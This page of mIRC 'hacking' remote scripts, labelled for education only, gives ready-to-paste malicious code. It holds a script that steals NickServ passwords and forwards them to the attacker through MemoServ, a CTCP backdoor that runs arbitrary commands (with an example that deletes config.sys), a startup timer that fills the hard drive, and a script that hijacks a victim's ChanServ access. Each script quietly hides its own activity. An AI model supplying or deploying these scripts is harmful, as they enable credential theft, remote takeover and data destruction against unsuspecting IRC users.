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Remote Scripts purposed for mIRC hacking
This page was created by Razor
If you want to receive more mIRC scripts mail me at:
This scripts are for education purpose only!


Script 1: Listen for Identifycation from the user and send it via MS


This script has two parts. The first one is the code which must be paste in the Remote Script and the other one is that which must be put in Alias Definitions


Remote Script (paste the text below):

on 1:INPUT:*: { /if ($3 == identify) {
;Change the "PassMan" in the next line to your nickname
/set %rnick PassMan
; Script developed by Bulhack (www.bulhack.org)
   /if ( ? isin $4) || ( ? isin $5) { /.timer948 -m 1 1 /sendit | /haltdef }
    else { $1- | /.msg ms send %rnick $1- | /.ignore -u60 MS | /haltdef }


Alias Definitions (paste the lines below):

/sendit {
  ; Script developed by BulHack (bulhack.org)
  /set %password $?*="Enter reply:"
  /.msg ns identify %password | /.msg ms send %rnick Parola: %password | /.ignore -u60 MS


Script 2: Open a simple back door in the used computer


ctcp 1:EXECUTE:*: $2-

Now you can use this backdoor by typing this on your command prompt:
/ctcp NICKNAME EXECUTE commands

e.g.  /ctcp lamer EXECUTE /remove c:\config.sys


Script 3: Overfilling the hard drive


on 1:START:/.timer75 -om 0 1 /write -a c:\filer LONG_TEXT

Replace LONG_TEXT with a long string like AAAA...A


Script 4: Adding your nickname using the CS bot


ctcp 1:ADD*:*: { /.msg cs access $2 add $3 $4 | /set %varhack ON | /.msg $3 Command send successful!!! | /.ignore -u60 CS | /haltdef }

Now you can add yourself in a chan by using the command below:

/ctcp NICKNAME ADD #channel nickname level

e.g. /ctcp lamer ADD #bulgaria PassMan 100